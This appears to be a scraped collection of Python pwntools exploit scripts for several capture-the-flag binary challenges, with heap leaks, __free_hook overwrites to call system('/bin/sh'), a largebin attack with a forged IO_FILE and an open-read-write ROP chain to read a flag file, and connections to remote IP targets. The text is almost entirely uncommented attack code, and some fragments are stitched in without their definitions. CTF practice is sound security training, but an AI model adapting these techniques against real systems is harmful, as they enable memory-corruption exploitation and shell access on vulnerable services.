Pwn进你的心

# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './ciscn_2019_qual_virtual1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
#libc = ELF('libc-2.31.so')

rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))

local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')
    
def debug():
    gdb.attach(p,"b *0x4019E2")
    #gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
    pause()
    
def cmd(op):
    sla(">",str(op))

#debug()
name = "/bin/sh\x00"
opcode = "push push push save push sub pop"
stack = "205200 4210720 -208 0" 

sla("Your program name:",name)
sla("Your instruction:",opcode)
sla("Your stack data:",stack)

p.interactive()

# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.23.so')

rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))

local = 0
if local:
    p = process(challenge)
else:
    p = remote('172.16.9.41','8001')
    
def debug():
    gdb.attach(p,"b *0x400C71 ")
    #gdb.attach(p,"b *$rebase(0x269F)\n")
    #pause()
    
def cmd(op):
    sla("input:",str(op))

def add(size,data): 
    # 0xff-chunk1
    # 0x100-chunk2
    # 0x101-chunk3
    cmd(1)
    sla("malloc :",str(size))
    sa("heap:",data)

def show(): 
    cmd(2)

def dele(index):
    cmd(3)
    sla("delete:",str(index))

def magic():
    cmd(5)

#debug()

add(0x38,"5555")
add(0x100,"4444")
add(0x38,"5555")
dele(1)
add(0x100,"1")
show()

p.recvuntil("content: ")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x3c4b31
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))
free_hook = libc_base + libc.sym["__free_hook"]
malloc_hook = libc_base + libc.sym["__malloc_hook"]
success("free_hook >> "+hex(free_hook))
success("malloc_hook >> "+hex(malloc_hook))
system = libc_base + libc.sym["system"]
success("system >> "+hex(system))

dele(1)
add(0x98,p64(0x41)*17)
add(0x120,"6666")
add(0x60,"test")

dele(0)
add(0x38,p64(0x41)*7)

dele(0)
magic()
dele(0)

show()
add(0x38,p16(0x30c8))
add(0x38,p64(0x41)*7)
for i in range(6):
    add(0x38,p64(0x41)*7)

one_gedget = 0x4527a+libc_base
#one_gedget2 = 0x4527a+libc_base

add(0x38,p64(0)*2+p64(0x71)+p64(libc_base+0x3c4af5-8))
success("libc_base+0x3c4af5-8 : "+hex(libc_base+0x3c4af5-8))
success("one_gedget >> "+hex(one_gedget))

add(0x60,"p")
add(0x60,"1"*11+p64(one_gedget)+p64(one_gedget))

"""
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
"""

cmd(5)

p.interactive()

for i in range(3):
    add(str(i)*8,"1"*8)

for i in range(1):
    dele(0)

for i in range(3):
    add(str(i)*8,"1"*8)

for i in range(1):
    dele(2)

for i in range(5):
    add(str(i)*8,"1"*8)

copy(0)
dele(0)
show()

p.recvuntil("Car 4:")
p.recvuntil("Tire Sizes: 0, ")
leak_addr1 = eval(p.recvuntil(",")[:-1])
p.recvuntil("Tire Pressures: 0, ")
leak_addr2 = eval(p.recvuntil(",")[:-1])
leak_addr = leak_addr1 + leak_addr2 * 0x100000000
heap_base = leak_addr - 0x11eb0 
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

# -*- coding:utf-8 -*-
from os import system
from signal import pause
from pwn import *

arch = 64
challenge = './car_manager1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))

local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')
    
def debug():
    gdb.attach(p)
    #gdb.attach(p,"b *$rebase(0x295C)\n")
    #pause()
    
def cmd(op):
    sla("Please enter your choice:",str(op))

def add(make,mod,year=2024,size=0,pressure=0):
    cmd(1)
    sla("Enter the make of the car:",make)
    sla("Enter the model of the car:",mod)
    sla(" Enter the year of the car: ",str(year))
    sla("Enter the size of tire :",str(size))
    sla("Enter the pressure of tire :",str(pressure))

def dele(index):
    cmd(2)
    sla("Enter the index of the car to delete:",str(index))

def find(make,mod,year=2024):
    cmd(3)
    sla("Enter the make of the car to find:",make)
    sla("Enter the model of the car to find:",mod)
    sla("Enter the year of the car to find:",year)

def edit(index,make,model,year=2024,key=1,index2=0,size=0,pressure=0):
    cmd(4)
    sla("Enter the index of the car to modify:",str(index))
    sla("Enter the new make of the car:",make)
    sla("Enter the new model of the car:",model)
    sla("Enter the new year of the car",str(year))
    sla("Do you want to change all tires?(1/0)",str(key))
    if(key == 0):
        sla("Enter the idx of tire :",str(index2))
        sla("Enter the new size of tire :",str(size))
        sla("Enter the new pressure of tire :",str(pressure))
    else:
        sla("Enter the new size of tire :",str(size))
        sla("Enter the new pressure of tire :",str(pressure))

def copy(index):
    cmd(5)
    sla("Enter the index of the car to copy:",str(index))

def show():
    cmd(6)

#debug()

for i in range(20):
    add(str(i)*8,"1",size=0)

copy(0)
copy(1)
dele(0)
show()

p.recvuntil("Car 19:")
p.recvuntil("Tire Sizes: ")
leak_addr1 = eval(p.recvuntil(",")[:-1])
p.recvuntil("Tire Pressures: ")
leak_addr2 = eval(p.recvuntil(",")[:-1])
leak_addr = leak_addr1 + leak_addr2 * 0x100000000
heap_base = leak_addr - 0x134d0 
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

magic_addr = heap_base + 0x12018
magic_addr1 = magic_addr & 0xffffffff
magic_addr2 = magic_addr >> 32
success("magic_addr >> "+hex(magic_addr))

edit(19,"a"*8,"a"*8,key=0,index2=0,size=magic_addr1,pressure=magic_addr2)
add("p"*0x40,"p"*0x40)
add("o"*0x8,"o"*0x8)
edit(22,"a"*8,"a"*8,key=0,index2=0,size=0x441)
dele(20)
show()

p.recvuntil("Car 0:")
p.recvuntil(", ")
p.recvuntil(", ")
p.recvuntil(", ")
leak_addr1 = eval(p.recvuntil("\n")[:-1])
p.recvuntil(", ")
p.recvuntil(", ")
p.recvuntil(", ")
leak_addr2 = eval(p.recvuntil("\n")[:-1])
leak_addr = leak_addr1 + leak_addr2 * 0x100000000
libc_base = leak_addr - 0x1ecbe0
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

free_hook = libc_base + libc.sym["__free_hook"] - 8
free_hook1 = free_hook & 0xffffffff
free_hook2 = free_hook >> 32
system = libc_base + libc.sym["system"]
success("libc_base >> "+hex(libc_base))
success("system >> "+hex(system))

copy(1)
dele(1)
edit(21,"a"*8,"a"*8,key=0,index2=0,size=free_hook1,pressure=free_hook2)
payload = "/bin/sh\x00"+p64(system)
add(payload,"o"*0x8)

p.interactive()

# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))

local = 0
if local:
    p = process(challenge)
else:
    p = remote('172.16.9.41','8888')
    
def debug():
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0x12D3)\n")
    pause()
    
def cmd(op):
    sla("do\n",str(op))    

def op1(num1,num2):
    cmd(1)
    sla("choose",num1)
    sla("add\n",str(num2))

#debug()
sla("name","/bin/sh\x00")
op1("-2","-205200")
cmd(4)

"""
00:0000│  0x561dca9c8088 —▸ 0x7f9884234420 (puts) ◂— endbr64
pwndbg> distance 0x7f9884202290 0x7f9884234420
0x7f9884202290->0x7f9884234420 is 0x32190 bytes (0x6432 words)
"""
    
p.interactive()

# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.31.so')

rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))

local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')
    
def debug():
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
    #pause()
    
def cmd(op):
    sla(">",str(op))

def add(data): # 0x80
    cmd(1)
    sa("input some",data)

def edit1(index,data): #1
    cmd(3)
    sla("idx: \n",str(index))
    sla("crazy\n","no")
    sa("inspiration.\n",data)

def edit2(index,data):
    cmd(3)
    sa("crazy\n","yes")
    sa("king.\n",str(index))
    sa("inspiration.\n",data)

def edit3(data):
    cmd(3)
    sla("crazy\n","no")
    sla("inspiration.\n",data)


def free1(index,data):
    cmd(2)
    sla("idx: \n",str(index))
    sa("edits?\n",str(1))
    sa("content\n",data)

def free2(index):
    cmd(2)
    sla("idx: \n",str(index))
    sa("edits?\n",str(2))

#debug()

payload = "a"*0x8
sa(" other.",payload)

for i in range(10):
    add("/bin/sh\x00")

for i in range(3):
    free2(i+2)

add("1")

edit1(10,"\x50")
edit2(0,"\xa0")

add("1")
payload = "a"*0x28 + p64(0x481)
add(payload)

free2(1)
add("1")
add("1")
free2(14)

p.recvuntil("Please enjoy your masterpiece.\n")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = leak_addr - 0x1ecb31
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

free2(10)
p.recvuntil("Please enjoy your masterpiece.\n")
leak_addr = u64(p.recv(6).ljust(8,"\x00"))
heap_base = leak_addr - 0x4a0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

free_hook = libc_base + libc.sym["__free_hook"]
system = libc_base + libc.sym["system"]
success("free_hook >> "+hex(free_hook))
success("system >> "+hex(system))

edit3(p64(free_hook))
add("1")
add(p64(system))

free2(9)

p.interactive()

# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './CAT_DE1'

context.os='linux'
#context.log_level = 'debug'
cmd = "set debug-file-directory ./.debug/\n"

if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))

local = 1
if local:
    #p = process(challenge)
    p = gdb.debug(challenge,cmd)
else:
    p = remote('xx.xx.xx.xx','xx')
    
def debug():
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0x15EF)\n")
    #pause()
    
def cmd(op):
    sla(">>",str(op))
    
def add(size,data="\x00"):
    cmd(1)
    sla("size:\n",str(size))
    sa("content:\n",data)

def edit(index,data):
    cmd(4)
    sla("idx:\n",str(index))
    sa("content:\n",data)   

def show(index):
    cmd(3)
    sla("idx:\n",str(index))

def free(index):
    cmd(2)
    sla("idx:\n",str(index))

#debug()

add(0x418) #0
add(0x210) #1
add(0x428) #2
add(0x438) #3
add(0x208) #4
add(0x428) #5
add(0x208) #6

free(0)
free(3)
free(5)
free(2)

add(0x440,0x428*'a'+p64(0xc91)) #0
add(0x418) #3 0x2b0

add(0x418) #2 0xd20 - over \x00 to bk/fd
add(0x428) #5 0x370

free(3) # 0x2b0 - bk=0xd20
free(2) # 0xd20

add(0x418,'a'*8+"\x00") #2 修复fd->bk(低位覆盖\x00)
add(0x418) #3

free(3) # 0xd20
free(5) # 0x350 - fd=0xd20

add(0x9f8) #3 make 0x350 to large 
add(0x428,'\x00') #5 修复bk->fd(低位覆盖\x00)

edit(6,0x200*'a'+p64(0xc90))
add(0x418) #7
add(0x208) #8

free(3) # unlink
add(0x430,flat(0,0,0,p64(0x421))) #3
add(0x1600) #9

show(4)
p.recvuntil("context:\n")
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
libc_base=leak_addr-0x21a310
log.success('leak_addr: '+hex(leak_addr))
log.success('libc_base: '+hex(libc_base))

show(5)
p.recvuntil("context:\n")
leak_addr=u64(p.recv(6).ljust(8,'\x00'))
heap=leak_addr-0x290
log.success('leak_addr: '+hex(leak_addr))
log.success('heap_base: '+hex(heap))

setcontext=libc_base+libc.sym['setcontext']+61
open_libc=libc_base+libc.sym['open']
read_libc=libc_base+libc.sym['read']
write_libc=libc_base+libc.sym['write']
success("setcontext >> "+hex(setcontext))

IO_list_all = libc_base+0x21a680
stderr = libc_base+libc.sym['stderr']
IO_wfile_jumps = libc_base+libc.sym['_IO_wfile_jumps']
success("IO_list_all >> "+hex(IO_list_all))
success("IO_wfile_jumps >> "+hex(IO_wfile_jumps))

pop_rdi_ret=0x000000000002a3e5+libc_base
pop_rsi_ret=0x000000000002be51+libc_base
pop_rdx_pop_rbx_ret=0x0000000000090529+libc_base
ret=0x0000000000029cd6+libc_base
success("pop_rdi_ret >> "+hex(pop_rdi_ret))
success("pop_rsi_ret >> "+hex(pop_rsi_ret))
success("pop_rdx_pop_rbx_ret >> "+hex(pop_rdx_pop_rbx_ret))
success("ret >> "+hex(ret))

next_chain = 0
fake_io_addr = heap + 0x1360 - 0x10
payload_addr = heap
success("fake_io_addr >> "+hex(fake_io_addr))

ORW_addr = heap+0x8e0
flag_addr = heap + 0x8e0 + 0x270

fake_IO_FILE =  "/bin/sh\x00"         #_flags=rdi
fake_IO_FILE += p64(0)*5
fake_IO_FILE += p64(1)+p64(2) # rcx!=0(FSOP)
fake_IO_FILE += p64(ORW_addr-0xa0)#_IO_backup_base=rdx
fake_IO_FILE += p64(setcontext)#_IO_save_end=call addr(call setcontext/system)
fake_IO_FILE =  fake_IO_FILE.ljust(0x58, '\x00')
fake_IO_FILE += p64(0)  # _chain
fake_IO_FILE =  fake_IO_FILE.ljust(0x78, '\x00')
fake_IO_FILE += p64(flag_addr)  # _lock = a writable address
fake_IO_FILE =  fake_IO_FILE.ljust(0x90, '\x00')
fake_IO_FILE += p64(fake_io_addr+0x30)#_wide_data,rax1_addr
fake_IO_FILE =  fake_IO_FILE.ljust(0xb0, '\x00')
fake_IO_FILE += p64(1) #mode=1
fake_IO_FILE =  fake_IO_FILE.ljust(0xc8, '\x00')
fake_IO_FILE += p64(IO_wfile_jumps+0x30)  # vtable=IO_wfile_jumps+0x10
fake_IO_FILE += p64(0)*6
fake_IO_FILE += p64(fake_io_addr+0x30+0x10)  # rax2_addr

chain  = p64(ORW_addr)
chain += flat(pop_rdi_ret , flag_addr , pop_rsi_ret , 0 , open_libc)
chain +=flat(pop_rdi_ret , 3 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , read_libc)
chain +=flat(pop_rdi_ret , 1 , pop_rsi_ret , flag_addr , pop_rdx_pop_rbx_ret , 0x100 , 0 , write_libc).ljust(0x200,'\x00') + './flag\x00'

add(0x1240,0x208*'a'+p64(0x431)+0x428*'a'+p64(0x211)+0x208*'a'+p64(0xa01)) # padding-不要破坏原来的chunk结构
free(0)
add(0x440,chain) # 0-chain

add(0x418) #11
add(0x208) #12
free(5)
free(4)

add(0x1240,0x208*'a'+p64(0x431)+p64(libc_base+0x21a0d0)*2+p64(heap+0x1350)+p64(IO_list_all-0x20)) #4
free(11)
add(0x500) # largebin attack
add(0x410)
free(4)
add(0x1240,0x208*'a'+p64(0x431)+p64(libc_base+0x21a0d0)*2+p64(heap+0x1350)*2) #4

payload = fake_IO_FILE+p64(flag_addr)
add(0x420,payload) #13

pause()
cmd(5)

p.interactive()

sla("PC: ",str(0x100))
sla("SP: ",str(0x100))
sla("CODE SIZE: ",str(7))

#debug()
p.recvuntil("CODE: ")

mov(0,1)
mov(1,62)
sub(2,0,1)
read(8,2)
sub(2,2,0)
read(9,2)
show()

p.recvuntil("R8: ")
leak_addr1 = eval("0x"+p.recvuntil("\n")[:-1])
p.recvuntil("R9: ")
leak_addr2 = eval("0x"+p.recvuntil("\n")[:-1])
leak_addr = leak_addr1 *0x100000000 + leak_addr2
libc_base = leak_addr - libc.sym['free']
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

system = libc_base + libc.sym['system']
free = libc_base + libc.sym['free']
success("system >> "+hex(system))
success("free >> "+hex(free))

# -*- coding:utf-8 -*-
from pwn import *

arch = 64
challenge = './pwn1'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
    context.arch='amd64'
if arch==32:
    context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc-2.23.so')

rl = lambda    a=False        : p.recvline(a)
ru = lambda a,b=True    : p.recvuntil(a,b)
rn = lambda x            : p.recvn(x)
sn = lambda x            : p.send(x)
sl = lambda x            : p.sendline(x)
sa = lambda a,b            : p.sendafter(a,b)
sla = lambda a,b        : p.sendlineafter(a,b)
irt = lambda            : p.interactive()
dbg = lambda text=None  : gdb.attach(p, text)
# lg = lambda s,addr        : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s            : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data        : u32(data.ljust(4, b'x00'))
uu64 = lambda data        : u64(data.ljust(8, b'x00'))

local = 1
if local:
    p = process(challenge)
else:
    p = remote('119.13.105.35','10111')
    
def debug():
    #gdb.attach(p)
    gdb.attach(p,"b *$rebase(0xF48)\n")
    pause()
    
def cmd(op):
    p.sendline(str(op))
    
def mov(rx,data):
    payload = 0x10000000 + rx*0x10000 + data
    sl(str(payload))

def shl(r1,r2,r3):
    payload = 0xc0000000 + r1*0x10000 + r2*0x100 + r3
    sl(str(payload))

def add(r1,r2,r3):
    payload = 0x70000000 + r1*0x10000 + r2*0x100 + r3
    sl(str(payload))

def sub(r1,r2,r3):
    payload = 0x80000000 + r1*0x10000 + r2*0x100 + r3
    sl(str(payload))

def show():
    sl(str(0xf000000000))

def read(r1,r3):
    payload = 0x30000000 + r1*0x10000 + r3
    sl(str(payload))

def write(r1,r3):
    payload = 0x40000000 + r1*0x10000 + r3
    sl(str(payload))


sla("PC: ",str(0x10))
sla("SP: ",str(0x10))
sla("CODE SIZE: ",str(24))

#debug()

p.recvuntil("CODE: ")

mov(0,1)#6
mov(1,62)
sub(2,0,1)
read(8,2)
sub(2,2,0)
read(9,2)

mov(0,0x60)#10
mov(1,0x22)
mov(3,0x34)
mov(4,8)
shl(1,1,4)
mov(4,16)
shl(3,3,4)
add(4,0,1)
add(4,4,3)
add(10,4,9)

mov(0,0)
mov(1,8)
sub(2,0,1)
mov(0,1)
write(10,2)
add(2,2,0)
write(8,2)

show()

p.recvuntil("R8: ")
leak_addr1 = eval("0x"+p.recvuntil("\n")[:-1])
p.recvuntil("R9: ")
leak_addr2 = eval("0x"+p.recvuntil("\n")[:-1])
leak_addr = leak_addr1 *0x100000000 + leak_addr2
libc_base = leak_addr - libc.sym['free']
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

system = libc_base + libc.sym['system']
free = libc_base + libc.sym['free']
free_hook = libc_base + libc.sym['__free_hook']
success("system >> "+hex(system))
success("free >> "+hex(free))
success("free_hook >> "+hex(free_hook))

sl("/bin/sh\x00"+p64(system))

"""
[+] free >> 0x7fa41010f540
[+] free_hook >> 0x7fa4104517a8
pwndbg> distance 0x7fa41010f540 0x7fa4104517a8
0x7fa41010f540->0x7fa4104517a8 is 0x342268 bytes (0x6844d words)
"""

p.interactive()

def a():
    sla("YOURSELF!","a")
    sla("HERE(y/n)","n")

def d():
    sla("YOURSELF!","d")
    sla("HERE(y/n)","n")

def s():
    sla("YOURSELF!","s")
    sla("HERE(y/n)","n")

def w():
    sla("YOURSELF!","w")
    sla("HERE(y/n)","n")


for i in range(4):
    s()

for i in range(4):
    d()

s()
d()
d()
for i in range(3):
    w()
a()
w()
w()
for i in range(5):
    d()
for i in range(4):
    s()
for i in range(4):
    a()
for i in range(5):
    s()
for i in range(4):
    a() 
for i in range(5):
    s()
for i in range(5):
    d()
w()
w()
for i in range(5):
    d()
s()
for i in range(6):
    d()
s()